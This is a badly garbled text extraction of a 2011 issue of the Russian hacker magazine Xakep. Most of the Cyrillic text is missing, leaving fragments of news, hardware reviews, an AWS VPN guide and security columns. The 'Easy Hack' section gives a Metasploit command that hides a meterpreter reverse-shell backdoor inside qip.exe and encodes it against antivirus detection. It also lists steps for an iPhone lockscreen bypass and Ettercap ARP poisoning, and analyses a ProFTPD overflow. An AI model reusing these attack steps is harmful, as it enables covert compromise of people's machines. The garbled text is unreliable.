Хакер 2011 01 PDF

.
210
:

: . 32
01 (144) 2011

2010

ICQ

CSRSS
VPN
AMAZON
INTRO
,

, .
,
Total Football Vogue :).

.
1. .
, 19. ,
.

.
27 28 :
.

, .
: 7 7,
:).
,
,
.
2. : habrahabr.ru/
company/xakep/blog/.
:

.
, ..

.

,
.
:
+154 3
.
,
, it.
3. www.xakep.ru, ,
, ,
,

. , ,
.
4.
, ,
:). :
.
!
nikitozz, .
nikitoz@real.xakep.ru
vkontakte.ru/club10933209 .
CONTENT
MegaNews
004
FERRUM
016
PC_ZONE
020
API Monitor
023
024
VPN Amazon
028
Internet Explorer 9:
032
API-
VPN-
078 JS-
Python
082
TO-5 2010
089
094
100
OpenSource

, ,

104
CSRSS
108
GUI
112
116
- Internet Explorer 9 Beta?
Linux BSD
, Windows 7

Mac OS X
036
Easy-Hack
040
046
050
054
ICQ: , ,
058
064
070
Top5 2010
134
074
X-Tools
140
FAQ UNITED
MALWARE
143
076
144
WWW2
HTTP-
ICQ
, TLS
SYN/ACK
120
124
128
PCI DSS

, ?
Zimbra:
/Internet Security

FAQ
8.5
web-
070
Top5 2010
094

OpenSource
082
TO-5
2010
>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>
Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
> DVD

Step
(step@real.xakep.ru)
Unix-
Ant
(antitster@gmail.com)
Security-
D1g1
(evdokimovds@gmail.com)

> xakep.ru
(xa@real.xakep.ru)
/ART
>-

>

/PUBLISHING
>
, 115280, , .
,19, , 5 ,
21
.: +7 (495) 935-7034
: +7 (495) 545-0906
>

>

>.

>

>

>

>

>

>

> GAMES & DIGITAL

>

>

> MAN TV

>
( )
(strekneva@gameland.ru)
>

>

>
(ashomko@gameland.ru)
> -
(alekseeva@gameland.ru)
>

>

/:
>
(kosheleva@gameland.ru)
>

>

>

> :
DVD-: claim@gameland.ru.
>

: (495) 545-09-06

: (495) 663-82-77

: 8-800-200-3-999
>
101000, ,
, / 652,

,

77-11802 14.02.2002
Lietuvas Rivas,
.
130 958 .

.

. ,
,
.

.
.

:
content@gameland.ru
, , 2010
MEGANEWS
X (magazine@real.xakep.ru)
MEGANEWS

P2P-. Dead Drop
, USB-,
. -,
5 . ,
Dead Drop
, . ,
, .
- :). deaddrops.com, . ,
. , offline- :).
9 Mozilla 6-
Firefox. 86% Google.
KINECT , KINECT
Microsoft,
Project Natal, Kinect.
.
, ,
. , Kinect :
.
4 2010 10 .
Adafruit Industries
Kinect. Xbox USB-, ,
. , RGB- ,
$1000 ( Kinect $150). , ,
Microsoft, ,
:). ,
11 , GitHub .
OpenKinect (www.openkinect.org)
, .
. , MIT
Kinect iRobot Create
, .
, KinetBot
3D .
( ) ,
YouTube.
004
X 01 (144) 2011
MEGANEWS
FACEBOOK-
Facebook, ,
.
Facebook . 500
Facebook, .
? eBay Facebook Mail
$500-700 ! ?,
. . , , ,
. ,
, SMS,
@facebook.
com.
,
. Office Web
Apps, Facebook mail
Microsoft Word, Excel PowerPoint. ?
. , , more fun, . , ,
500 , Facebook
, , GMail Google HotMail
Microsoft. , Facebook
fb.com, (American Farm Bureau) :).
Google Android 350

.

.
,
,
, ,
, .
,
,
- . , , .
(firmware) ,
IMEI-,
.
.
. IMEI,
(
),
. :
IMEI ?
. :
, IMEI

006
.
.
,
. , ,
. :
, , ?
.
, , ,
. ,
.
X 01 (144) 2011
MEGANEWS
ANDROID
, Android. Black Hat, Intel.
. HTC Android . ,
.
proof-of-concept Google Market ( Angry Birds)
: , . Alert Logic
(, - Webkit).
: www.exploit-db.
com/exploits/15423. , , , , .
Android 2.2, 36% . ,
,
Android OS.
, Google, , .
Google Market, Android
2.2, , .
GOOGLE MAPS =

-. ,

,
, . ,
,
, ,
, -.
.
... Google Maps.
,
-,
-

. -
( ,
) , .
Google, ,
. ,
: 2007
,
, - GPS
. :
, Google Maps
Wikipedia.
Skype ,
. 22
25 . 560 .

, :
, ,
!. ,
,
, .

-
008
(RIAA)

. Facebook
RIAA,
- ,
!
RIAA
The Pirate Bay, Torrentz, Demonoid

Rapidshare. ,
. ,
,

.
X 01 (144) 2011
ZEUS
,
ZeuS, , .

,
, -,

. ,

ZeuS ,
.
,
.
.
,
, .
,
, , ,
(MDAC, Adobe Reader, Windows Help Center, Java),
ZeuS.
, , ?

, . ,
,
, ,
ZeuS-.
:
, ,
..
,
, .

,
,
.

.
- , 11

., ,
.

240 ,

.

-
:
~90 ,
. ,
:
,
. ,

(: )
.,
(:
) .. :
. ,
,
. 49.5%
294.000
Ru-Center. ,

,
. ,
. , ,

,

.
: ,
. Ru-Center,
, ,
,
, .
,

. 19
14 .
-

. (
) .
.

glassdoor.com. ,
IT-, , - (Software Engineer). , Facebook
$110 500 , $11 900 . Cisco $105 720
$8 529 Yahoo $101 638 $6 197 . , ,
Apple, Microsoft Google .
$99 127 , Google $98 814 (
: $21 364). Microsoft . , . ,
CEO Google, , (
20 000 ) 10%, $1000. , Google
Facebook.
X 01 (144) 2011
009
MEGANEWS

! , AVK.Dumx.A Trojan,
(
),
.
, ,
, , .
,
$300 000,
SMS . ,

, . , -
SMS-
,

( ,
)
. ,
, .

.

SMS
-.
,
IT- ,
,
,
, -
. ,
.
W3Techs ,
,
, : PHP 74.9%, ASP.NET 23.8% Java 3.9%.
AMD
, Czernobyl,
,
.
Czernobyl ,
AMD ( Athlon
XP) x86. ,
, www.woodmann.
com ( ,
). ,
,
,
. ,

.

. AMD , ,

,
,

010
. ,
Czernobyl
,
.
- ,

, .
X 01 (144) 2011

E-Ink
.
.
. E Ink
E Ink Triton,
4096 16 . ,
-,
, .
Triton -
: ,
(
). ?
.
20% Pearl,
Kindle Kindle DX.
, Triton -
.
, , Hanvon
Technology. 80%
. ,
9.68- (800600) Wi-Fi 3G,
$440. E Ink
LG Display.
Google
Tier 1. 2010 5%
, 6.4%.
Google 80%.
IPHONE
$40 000 17- - , iPhone 4. ,
, . ,
,
Apple. ? ,
. iPhone
4 , .
, , , Foxconn.
,
$130 .

, Home, , .
$279. ,
$169. ,
: www.whiteiphone4now.com.
X 01 (144) 2011
011
MEGANEWS
Group-IB,
20%
. ,
$1 .
ICQ

AOL

ICQ
Digital
Sky Technologies (DST),
Mail.ru Group, $187.5 .
, ICQ
,
Mail.ru ,
DST.
, ,
ICQ-
. .
Nimbuzz. , ICQ Nimbuzz :

icq-
, . Nimbuzz OSCAR (ICQ). ,
QIP, R&Q, Miranda IM
. , Mail.ru Group
ICQ Mail.Ru.. ,
. ICQ-
SMS
666 ICQ --,
, . :
, . , ,
. Jabber,
.
Windows 8
2012,
Microsoft.
012

, ,

.
. ,

,
. , ,
,
.
, $28 .
.

,
(
NFC Near Field Communication).
BlingTag, (RFID). ,
,
,
PayPal
(, ). SMS
.
, PayPal
, ,

Bling Nation.

$100,
49 .
. ,
eBay
PayPal.
.
BlingTag 20 000 ,

. ,
,
Bling Nation,
.

,
BlingTag
.
X 01 (144) 2011

, , .

?
, ,
, .
K750 Logitech .

!
, . , K750
( ?) ,
,
.

8 .
2.4 AES
128- ( Logitech Unifying ).
$80,
,
:).
Google
, Chrome.
, : YouTube, Orkut, Blogger,
Google Docs Gmail. $500 $3133.7.
X 01 (144) 2011
,
, Cyborg R.A.T.9 Mad
Catz .
R.A.T. , ,
.
: 25 5600
25 . , 2.4
( 1 ).
1000 , ,
, 6
/.
,
. : ,
, ,
, .
6 . , Cyborg R.A.T.9
,
. , -
9 4
.
, Cyborg R.A.T.9
5- .

, ,
. $150.
013
MEGANEWS
SDD ZALMAN
, Zalman

SDD-.
: S-Series N-Series.

SandForce, SSD
S-Series
JMicron. Zalman
- 2,5 SATA 3.0 Gbps,
TRIM Windows 7.
S
32, 64 128 ,
260 /. ,
, : 60 /
, 120 /
210 / . N
64
128 ,
280 270 /c
. .
32- S- $99.99,

N- $289.99.
$100 000 Microsoft Plants

Vs. Zombies Windows Phone 7.
.
MACBOOK AIR
Apple
MacBook Air.
-, Air

- -.
2 , ,
MacBook Air :
0.28
1.7 . , , : c
13.3- ( 1440x900
) 11.6" (
1366x768 ). 13.3-
: Intel Core 2 Duo 1.86 , 2
, -
128 256 NVIDIA
GeForce 320M 256 DDR3 SDRAM.
11- :
Intel Core 2 Duo 1.4 , 2 , - 64
128 .
, 4 . -
014
,
Multi-Touch, FaceTime,
.
AirPort Extreme
Wi-Fi (802.11n) Bluetooth 2.1 + EDR.
,
:
$999 11.6-
(, ).
13.3- MacBook Air $1299.

, Apple
. ,
, 11-
,
.

( ,
),
. Apple ,
,

.
X 01 (144) 2011
FERRUM

SAMSUNG
SCX-4600
, /: 22
, : 10
: 1200X1200
, /: 22
: 1200X1200
, : 250
, : 64
, : 360
, : 416X409X275.8
, : 10.69
6500 P

,
,

. , , ,
. , ,
, . , .
, , .
,
, . Samsung SCX-4600
, ,

.

,
,
. ,
-,
Samsung SCX-4600 . ,
, , ,
:
, -
.
. ,
.
,
. , .
X 01 (144) 2011

- . ,
AnyPrint,
,
- ,
. , .
.
, ,
AnyPrint. ,
,
, ,
, .
, :
, ,
.
, ,
, ,
. : 10 ,
(
, , , ) Samsung SCX-4600
38 , 9 .
, .
Samsung SCX-4600 , . ,
, . z
015
FERRUM
CANYON CNR-WCAM820
CREATIVE LIVE!CAM OPTIA AF
GENIUS ISLIM 2020AF
LOGITECH C600
LOGITECH QUICKCAM SPHERE
MICROSOFT LIFECAM VX-5500
, ,
, -.
, , .
, .
, , , -?
,
. , , ,
-, ,
- . ,
. ,
, , ,
, . , ( , )
.
, . ,
.
( ),
! ,
,
,
016
.
, , , ,
(
). .
, ,
, . ,
,
,
. ,
.

,
:
,
. ,
. , .
,
/ . ,
,
, , , -
.
X 01 (144) 2011
1200 .
Canyon
CNR-WCAM820
:
, : 2,0
(), : 5,3
, /: 30
:
:
- , . Canyon CNR-WCAM820
: ( ) ,
, , . , ,
: ,
, . , ,
,
, .
, ,
. USB
, ,
.
, ,
.
X 01 (144) 2011
2900 .
Creative
Live!Cam Optia af
:
, : 2,0
(), : 7,7
, /: 30
:
:

. . , : .
, . ,
(F/2,9),
. ,
.
, , ,
YouTube .
, .
,
.
,
, ,
, .
017
FERRUM

3100 .
1700 .
Genius iSlim
2020AF
:
, : 2,0
(), : 8,5
: 1,3 9 /, 2 6 /
:
:
- , , , , .
.
,
, , - ,
, .
, - .
,
, . ,
: ,
. . .
018
Logitech
C600
:
, : 2,0
(), : 8,0
, /: 30
:
:
, ,
,
.
( , )
. , , , :
.
, , . ,
, , : ,
.
, .
.
X 01 (144) 2011
6000 .
2200 .
Logitech QuickCam
Sphere
Microsoft LifeCam
VX-5500
, : 2,0
(), : 8,0
, /: 30
:
:
, : 0,3
(), : 1,3
, /: 30
:
:
: , . ,
.
, ,
. ,
, ,
,
. , , . ,
, , .
, -
. ,
- .
, ,
, .
,
,
.
.
,
. ,
.
.
. ,
,
.
X 01 (144) 2011
019
PC_ZONE
oxdef.info;

API Monitor
API-
, , ,
, - .
, ,
,
. API-.
Windows
DLL, .. .
API-,
. ,
, ,
.. API-,
. (
)
.
, API. RegMon FileMon
. API-,
, . API-
API Monitor. ,
API COM-. , ,
.
API Monitor?
: 1.5
2001 .
020
. !
.
,
.
.
Summary, ,
API: , DLL,
, API-
. ,
, .
10 000 API-
166 DLL', 700 600 COM-
( Shell, Browser, DirectShow, DirectSound, DirectX ..).
API
MSDN.
API Capture Filter API-,
. , API Monitor
GUID, IID REFIID , .

MSDN.
API Monitor , .
. CreateFileW
X 01 (144) 2011
API Monitor

dwSareMode. , ,
1, , ?
(
Parameters Decode Parametres
Values), API Monitor
FILE_SHARE_READ | FILE_SHARE_WRITE".
API-
, .
, ,
,
API- .
, ReadFile
lpBuffer API
Monitor' lpNumberOfBytesRead
( ) .
, ( Hex Buffer),
,
. , ,
,
.
Summary
, ,
API-.
, .
Call Stack,
.
API , , .
GetLastError, CommDlgExtendedError, WSAGetLastError.
, NTSTATUS
HRESULT . , Notepad
CreateFile, API Monitor
X 01 (144) 2011
Firefox
, . , 5,
.
API Monitor
64- .
32- 64- . , 32-
32- .
32- 64-
Windows, 32- API
Monitor.
hook
, API Monitor
. : /
, .
,
. ,
, API- CreateFileA, CreateFileW
NtCreateFile, .
API Capture Filter. ,
, , , , ,
.
(Ctrl-F Edit Find), -
DVD
dvd

DVD-
021
PC_ZONE

API-
WinApiOverride
API- , API, . ,
, .
kerberos
WinAPI-. API, ,
.
*.rep .
GMail
APISpy32
APISpy32 WinAPI. ,
.
CreateFile. API Monitor
. . ,
Running Processes,
API Monitor'.
. File Hook Process,
Windows notepad.exe (
). , ,
- .
.
. ,
, .
API Monitor. Summary
, Notepad'.
CreateFileW
kernel32.dll, , , NtCreateFile.
:
.
. NtCreateFile STATUS_
OBJECT_NOT_FOUND, kernel32.dll Nodepad
INVALID_HANDLE_VALUE 2 =
.
, - ,
API Monitor. , NtCreateFile
STATUS_SUCCESS .
.
SSL-
, API
Monitor, , API-.
, ,
SSL-, .
API Monitor , ,
. , , , , -
. Internet Explorer:
1. , SSL. Gmail.
2.
Windows Internet. : API Monitor
.
3. Running Processes Internet Explorer
(Hook).
4. ,
022
GMail
.

Google SSL-. API- .
5. , API Monitor, API HttpSendRequestW. ,
: , , , . lpOptional
(Post-Call Value). , Hex Buffer
, Internet Explorer .
, ASCII.
, .
Firefox, Windows Internet Netscape
Portable Runtime Mozilla SSL. , API Monitor
. , , PR_Write. Firefox',

. Summary PR_Write,
xul.dll. . POST- ,
buf. , POST /
accounts/ServiceLoginAuth ( Hex Buffer). Pre-Call Value ,
. . , API Monitor
. ,
Tools Options Maximum size of
captured buffers. .
API-, , API-,
(. ). ,
, API Monitor , .

DLL-, XML-,
.z
X 01 (144) 2011
PC_ZONE
Step twitter.com/stepah

. . ,
, ,
, . ,
.
, ,
, ,
. ,
, ,
, .
+2
, ,
,
. :).
, . , , , ,

. ,
. : 22" 24"
6 8
.
,
. , ,
, ,
, -
. ,
, ,
.
.
,
. , ,
, ,
. , ,
. -
,
, Google Docs,

DropBox. , .
, ,

X 01 (144) 2011
.
- .
. .
,
,
. ,
,
(,
),
.

,

. , -
,

(
).
, ,
Synergy+ (www.synergy-foss.org).
: .
, :

. ,
.

Windows, Linux Mac OS X.
,
, ,
Synergy
. (
,
) .
GUI-.
:
1. Share this computer's
keyboard and mouse (server).
2. Configure.
3. Screens
.
+ Screen Name (
!),
.
4. ,
,
.
.
.

. .
5. Test ( ,
) Start.
:
1. Use another computer's
shared keyboard and mouse (client).
2. Other
Computer's Host Name.
3. Test
,
Start.
,
. , . , Synergy Ubuntu Mac OS X:
GUI- ,

. z
023
PC_ZONE
Step twitter.com/stepah
VPN Amazon
VPN-

Amazon .
, , ,
, , ,
VPN-.
(.. cloud computing) ,

, ,
. , . Amazon S3 ,

, . S3
Amazon
Web Services (AWS). , ,
( ).
.
Amazon Web Services
Amazon , : Amazon
Elastic Compute Cloud ( EC2), Amazon Elastic Block
Store ( EBS), Amazon Simple Storage Service ( S3).
.
024
, cloud computing .
EC2
.
, .
Instance.
, , root SSH ( Linux) RDP ( Windows).
.
, .
:
.
, , . .
.
Amazon EBS. :
X 01 (144) 2011
AWS
25 , .
, .
Volume
.
, ,
.
S3
, .
, , .

, :10 , 1 5000
, (5 ).
, AWS Free Usage
Tier .
, . . ,
750
EC2 ( ,
), 10 EBS
( , ,
, Ubuntu) 5 S3.
Amazon,
.
,
, , ,
.
.

VPN-,
!
Ubuntu

Amazon' . AWS (aws.amazon.com)
Sing up Now.
I am a new user
Amazon.
,
. : ,
. Amazon $1-2, .
Visa MasterCard:
, Qiwi.
Amazon .
(EC2, EBS, S3
..).
. , 4-
PIN-,
. . EC2 S3
: Access Key ID Secret Access Key,
DVD
dvd

AWS.
X 01 (144) 2011
025
PC_ZONE
EC2
- AWS,
, .
Elasticfox Firefox.

AWS Access Key AWS Secret Access Key.
, Amazon
(s3.amazonaws.com/ec2-downloads/ec2-api-tools.zip)
EC2.
Java Runtime Environment.
Instance: Micro (t1.micro)

, Micro Instance. Amazon
.
Amazon EC2
X.509 Certificate. ,
-, : Amazon
.
AWS (aws.amazon.com/
console). ,
, EC2.
c EC2
,
(.. ) .
99.95%
.
Launch Instance ().

.
: Small Instance (Default) 1.7 GB of memory,
1 EC2 Compute Unit (1 virtual core with 1 EC2 Compute Unit), 160 GB of
instance storage, 32-bit platform $0.10 Unix $0.125
. , $0.10 $0.17 . ,
. ,
Amazon Micro
Instance. .

. AMI
(Amazon Machine Image), , ,
( , Apache, MySQL,
Memcached ..), (, ). .
AMI-
Amazon', . Community
AMIs 6000 Linux Windows.
Ubuntu.
AMI ,
15 EBS, 10
. , Ubuntu 10.04 ami-c2a255ab, 10 . ID
Install. , . ,
026
, .
Instances . , State Running ,
. . Public DNS
. : , IP-
. !
Elastics IPs
IP- .
: ,
. ,
IP-, .
SSH,
. :
. , Security Group. ,
.
E2, Ubuntu.
SSH.
PuTTY. , Amazon pem,
PuTTY ppk. , PuTTYgen
: (Load private
key file), File.
SSH-
, :
Sessions IP- (Elastic IP)
Host Name;
Connection Data Auto-Login
ubuntu, ;
Connection SSH Auth
private-;
Session
Save.
, ,
Open.
.
PPTP
, PuTTY
, Ubuntu.
X 01 (144) 2011
VPN- Windows
sudo /etc/init.d/pptpd restart
SSH-
,
SSH- . .
, , SSH- . :
, . , ,
VPN-. : OpenVPN, PPTP-.
. OpenVPN
. PPTP ,
, GRE. .
, Ubuntu, PPTP- .
:
, . ,
VPN- . ,
NAT. ,
/etc/sysctl.conf :
net.ipv4.ip_forward=1
:
sudo sysctl -p
NAT, :
sudo iptables -t nat -A POSTROUTING -o eth0 -j
MASQUERADE
sudo aptitude install pptpd
.
IP-,
.
2 /etc/pptpd.conf:
localip 192.168.242.1
remoteip 192.168.242.2-5
PPTP
192.168.242.1, 4 :
192.168.242.2 192.168.240.5.
DNS-. Amazon
(172.16.0.23), , , Google Publuc DNS.
/etc/ppp/pptpd-options:
ms-dns 8.8.8.8

PPTP-:
sudo echo <_> pptpd <> * >>
/etc/ppp/chap-secrets
<_> <>
. . /etc/ppp/chapsecrets ,
PPTP-:
X 01 (144) 2011
. :)
/etc/rc.local,
exit 0 :
iptables -t nat -A POSTROUTING -o eth0 -j
MASQUERADE
VPN . , - IP-
, . speedtest.net
. , , VPN
. Amazon 15
.
: 10 . :)
Amazon ( ) . . EC2 , .

.
VPN-.
: ,
,
- . ,
Amazon Instance GPU,
CUDA.
,
? z
027
PC_ZONE
lenskyi.d@gmail.com
INTERNET
EXPLORER 9:
-
Internet Explorer 9?
15 - Internet
Explorer 9. , .
,
. :)
028
X 01 (144) 2011
Internet Explorer
, IE ,
, . :
, . -,

, -. ,
. , . ,
Microsoft
Server is too busy :).
,
.
favicon, , , .
10 , , . NumRows HKEY_CURRENT_USER\
Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage.
, :
. ,
, ,
( 20-30 ), . ,
, .
. ,
, ,
: . ,
. Firefox'

.

- , Snap, Windows.
.. ,
( ),
.
. X 01 (144) 2011
,
. Windows 7,
IE .
Internet Explorer ,
. , ,
,
(, GMail)
.
Technical Review, Internet

Explorer .
. -,
, .
, - ,
. ,
,
IE9 Beta. Direct2D GPU.
,
GPU (
). . -, ,
, JavaScript-, Chakra.

JavaScript. . ( IE8), IE9
JS
DOM, (.. marshaling). , .
, Internet
Explorer, JS- .
, JavaScript
, .
, .
,
, Chakra,
JavaScript WebKit's SunSpider. 17
Internet Explorer 9, Platform
Preview 7, , .
029
PC_ZONE

. . , ,
,
. ,
, .
, , .
, ,
UI .
.
(XSS),
. Internet
Explorer .
,
.
Microsoft SmartScreen. ,
.
.

-. SmartScreen ( , -, IE
IE)
. , Internet Explorer .

. , - .
( IE InPrivate)
, ,
.
,
. ,
,
. , :
- , .
HTML5, SVG, CSS 3, ECMAScript5 DOM ,

( ,
, HTML5:
][).
IE9 , HTML, JavaScript CSS. Internet Explorer,
030

, .
, Microsoft
W3. IE9
Acid3, 95/100. 5
SVG- SMIL- SVG, . , ,
-,
.
HTML5, -
<video> <audio>. ,
( Silverlight
Flash'). ,
. , , IE9
-, .
<canvas>,
API Canvas 2D. HTML5,
. (
<canvas> ) IE9
Direct2D DirectWrite.
, . ,
DevTools.
( F12) ,
.
c HTML/CSS-,
JavaScript, User-Agent
HTTP-, .

. , , Fiddler (www.fiddler2.com/
fiddler), .
, ,
.
, , JavaScript
Format JavaScript, JavaScript
. . -,
, - . ,
.
Internet Explorer.
! z
X 01 (144) 2011
PC_ZONE
www.insight-it.ru
100
, . .

.
, - .
HighLoad++,

, , - -
032
.
, .
. :
X 01 (144) 2011

,
? ,
, , , ?
: = - + , .
:
, .
100% . ?
, ,
: ,
,
. , ,
.
Debian
Linux , ,
. HTTP- nginx,
reverse proxy.
, PHP-, . PHP- X 01 (144) 2011
mod_php Apache
, FastCGI,

,
. PHP- (, Facebook
PHP C HipHop),
-
XCache.
:
, , C
, MySQL . . ,
,
( ).

memcached. : ,
.

"" .
, ,

, , , . ,
033
PC_ZONE

99,5 .
40 ( ).
11 .
200 .
160/.
10 , 32
nginx ( Apache ).
30-40 , 2 , 5 , .
10 .
node.
js (
JavaScript ][ 08/2010) XMPP aka Jabber ( ).

ffmpeg, - VLC.
- ,
. ..
, .. .

. , , ,

,
. ,
, 20%.
,
DNS ( 32 IP-),
,
. ,
( )
,
memcached .
, ,
,
PHP-.
Facebook (
), Facebook
MySQL.
,
,
opensource .
( ),
.
, :
- 8- Intel ( ,
);
- 64 ;
- 8 ;
- RAID (
).
034

Agile
(),
: , , ,
.
(
), Debian.

,
.
memcached, ... ;
, .
.

, .
1 :).
, ,
. 4 -
,
, .

, Content Delivery
Network
.
, ,
. ,
: ? !.
, ,

( xfs) , . ,
,
:).

C. , ,
,
, , , ,
. ,
, TopCoder,

:
-
MySQL ,
.

memcached. (
).

.
GPL, -
.
X 01 (144) 2011
Debian Linux (www.debian.org)

nginx (sysoev.ru/nginx)
PHP (www.php.net) + XCache (xcache.lighttpd.net)
Apache (www.apache.org) + mod_php
memcached (memcached.org)
MySQL (www.mysql.com)
C,

node.js (nodejs.org)
XMPP, HAProxy (haproxy.1wt.eu)
xfs (xfs.org)

ffmpeg (ffmpeg.org)
, . ,
, .
,
. 10001500
,
. -
, .
, - -
, , , YouTube,
, ,

.
, Jabber (
XMPP).
opensource . (

)
, XMPP . node.js ,
JavaScript ,
.
-.
,
:
, .

. 60-80
, 150 . TCP/HTTP-
HAProxy
,
.
( ,
MongoDB),
MySQL. 5-
, node.
js ( 4 ),
MySQL. X 01 (144) 2011

XMPP
,
, - ,
.

, .
,
,

.
, ,
:

IFrame- easyXDM
fastXDM,

.
.
- Twitter,
.
,
openGraph- (
<title> alt .
(YouTube, RuTube, Vimeo, ..).
WARNING
warning

.
,

,
.

,
/
.

.

,
, - . ,
,
, ,
.
, ,

. - 11
, 100 . z
035

GreenDog agrrrdog@gmail.com
Easy Hack
1
:
IPHONE
:
. , ,
:).
, (
, ,
), , , . ,
- . ,
.
, ,
. , , .
.
, .
1)
2):
Emergency Call
3) 3 :
###
4) Call Power
! Lockscreen Bypassed!
, -, . (
), , .
! ,
- , .
iOS 4.1,
. 4.2
,
, ...
. :).
:
EXE-,

:
,
IExpress,
exe', . ,
.
Metasploit' (metasploit.com).
msfencode exe- (payload),
exe-. -
.
. qip.exe.
./msfpayload windows/meterpreter/reverse_tcp
LHOST=192.168.0.101 R | ./msfencode -t exe d ~ -x qip.
exe -k -o q_bd101.exe -e x86/shikata_ga_nai -c 3
msfpayload -
(LHOST). (R).
msfencode. (-e x86/
shikata_ga_nai) (- 3).
exe- (-t exe). , exe- (-d ~ ), qip.exe (-x qip.exe).
-k , exe-.
q_bd101.exe (-o q_bd101.exe).
036

:)
Exe-, , ,
,
MSF.
, . -
, :).
. -,
, . - (
) .
.
-k, . -, , .
-, (15 42
virustotal.com), .

Windows! ,
CRC, . -
. ,
, .
! ,
X 01 (144) 2011
. ,
, , ,
, , -
, .
, :).
:
, , .
-, : ,
:). -, ,
, . ,
, ,
. remote_browser Ettercap-NG (ettercap.
sourceforge.net). -, -!
.
, ettercap.conf:
1) :
nano /etc/etter.conf
2) ec_uid, ec_gid :
ec_uid = 0
ec_gid = 0
3) remote_browser :
remote_browser = "firefox http://%host%url"
,
, .
- Ettercap:
1) ettercap:
Ettercap G
2)Sniff Unified sniffing;
3)Plugins Manage the plugins;
4) remote_browser;
5) :
Start Start sniffing
- -
.
, arp-poison. :
:
TCP/IP
:
-, , , , . :
, . , ,
TCP/IP,
( ). , ,
, ,
. . , ,
hping', - , .
, , Wireshark'a.
:).
.
, , , . Colasoft
Packet Builder (colasoft.com/packet_builder).
.
X 01 (144) 2011
arp-poison GTK-Ettercap-NG
1) :
Hosts Scan for hosts
2) :
Hosts Host list IP_router Add to T1
3) ():
Hosts Host list IPs Add to T2
4) arp-poison:
Mitm Arp poisoning Sniff remote connection
pcap- , tcpreplay:
tcpreplay i eth0 blah_blah.pcap
. -, , ,
. -, ,
.. , ,
. , , Win
Ettercap-NG.
, Windows. , .
, ,
Ethernet, ARP, IP,
TCP, UDP. , ,
:).
TCP/IP
037
,
, Wireshark. , Colasoft
Packet Builder cap-. Wireshark
pcap-, cap pcap ,
.
, ,
. TCP ( -
:
TCPDUMP'
), -
.
, Colasoft Packet Player.
. , tcpreplay,
, .
, .
, .
and, or ; tcp portrange 1-1024 tcp .

tcpdump -w test.pcap -s 1550 net 192.168 and not arp
:
.
, , , , ,
, . . tcpdump
,
.
tcpdump , WireShark'
Capture Filter, .
.
tcpdump -w test.pcap -i eth0 host 192.168.0.101 and tcp
portrange 1-1024
-i eth0 ;
-w test.pcap , ;
host 192.168.0.101 , /
192.168.0.101;
:
NMAP
:
. , , :).
, - /,
, . . ,
.
( ), , IP- , .
, ,
idle-, Nmap (nmap.org). Antirez
1998 , ( )
ID IP , ..
, IPID.
.
- . - , .. .
, IPID . IPID.
TCP SYN- -
IP . , SYN-ACK. SYN-ACK
TCP- , RST-
, IPID.
, RST-, . RST- ,
IPID .
, SYN- , IPID,
, .
IPID .
038
-s 1550 , (
tcpdump' 96 );
net 192.168 , /
192.168;
not arp ARP-.
tcpdump -w test.pcap src 192.168.0.101 and ( tcp port
31337 or udp $ 4523 or 5543 $)
, 192.168.0.101,
31337 TCP, 4523, 5543 UDP.
, .
, , IP-, MAC- ..
OR, AND NOT. ,
||, &&, ! . , . ,
Don't Fragment IP-,
SYN- TCP. :).
( ), ,
. nmap.
org/book/idlescan.html.
, .
, , ,
.
,
. IPID, .
,
Nmap -
(-v). , IP ID Sequence Generation:
Incremental, . . , ,
.
NSE, (nmap.org/nsedoc/
scripts/ipidseq.html).
.
:
nmap -v 192.168.0.105
192.168.0.105 IP .
idle-c:
nmap -sI 192.168.0.105 -PN -v 192.168.0.1
-sI 192.168.0.105 IP-;

-PN , , ;
-v ;
192.168.0.1 .
X 01 /144/ 2011
Idle- Nmap Wireshark

IP-,
. -, , .. .
-, IDS/, . , .
:
,
.
. l517 (
:). code.google.com/p/l517.
.
:
1) , .
2) , -.
3) .
4) -, .
5) (
).
5) , .
Win , , -.
,
. ,
. , ,
;).
. z
X 01 /144/ 2011
- Windows
039

(CISS Research Team, http://twitter.com/NTarakanov )
01
int toread, handle_iac = TRUE, saw_newline = FALSE;

pr_buffer_t *pbuf = NULL;

PROFTPD
if (buflen == 0) {
errno = EINVAL;
return NULL;
}

FTP Proftpd. ,

ZDI(Zero Day Initiative), 40 . ,
, ,
2 !
67-
e-zine'a phrack.
.
...
buflen--;
if (in_nstrm->strm_buf)
pbuf = in_nstrm->strm_buf;
else
pbuf = netio_buffer_alloc(in_nstrm);
TARGETS
Proftpd version < 1.3.3c released.

:
bugs.proftpd.org/show_bug.cgi?id=3521;
bugs.proftpd.org/show_bug.cgi?id=3519;
xorl.wordpress.com/2010/11/15/cve-2010-4221-proftpd-telnet_iacremote-stack-overflow/.
while (buflen) {
...
while (buflen && toread > 0 &&
*pbuf->current != '\n' && toread--) {
cp = *pbuf->current++;
pbuf->remaining++;
BRIEF
-
pr_netio_telnet_gets() src/netio.c
, Telnet IAC (Interpret As
Command) escape-. ,
, FTP FTPS ,
.
-
mod_site_misc. ,
.

mod_site_misc
.
...
default:
*bp++ = TELNET_IAC;
buflen--; <-----
telnet_mode = 0;
break;
}
...
*bp++ = cp;
buflen--; <-----
}
...
EXPLOIT
properly_terminated_prev_command = TRUE;
*bp = '\0';
return buf;
.
pr_netio_telnet_gets(), src/netio.c:
}
char *pr_netio_telnet_gets(char *buf, size_t buflen,
pr_netio_stream_t *in_nstrm,
pr_netio_stream_t *out_nstrm)
{
char *bp = buf;
unsigned char cp;
040
, buflen
. , buflen , TELNET_IAC buflen 1,
! buflen , ,
X 01 (144) 2011
FltReleaseContext
,
. interger overflow,
buffer overflow.
Kingcope: exploitdb.com/exploits/15449. :
FreeBSD, Linux:Debuan,SUSE,CentOS. Debian Squeeze
ROP pool
buffer (cmd_rec res pr_cmd_read), Ubuntu ROP
: RWX , stub .
, Linux
(stack smashing protection) . , ! ookie
Ubuntu 24- ,
100% .
SOLUTION
proftpd-1.3.3c , , buflen,
:).
src/netio.c
.........
+/* In the situation where the previous byte was an IAC,
X 01 (144) 2011
we wrote IAC into the output buffer, and decremented

buflen (size of the output buffer remaining). Thus we
+ need to check here if buflen is zero, before trying to
decrement buflen again (and possibly underflowing the
buflen size_t data type).
+ */
+
if (buflen == 0) {
+
break;
+
}
*bp++ = cp;
buflen--;
.........
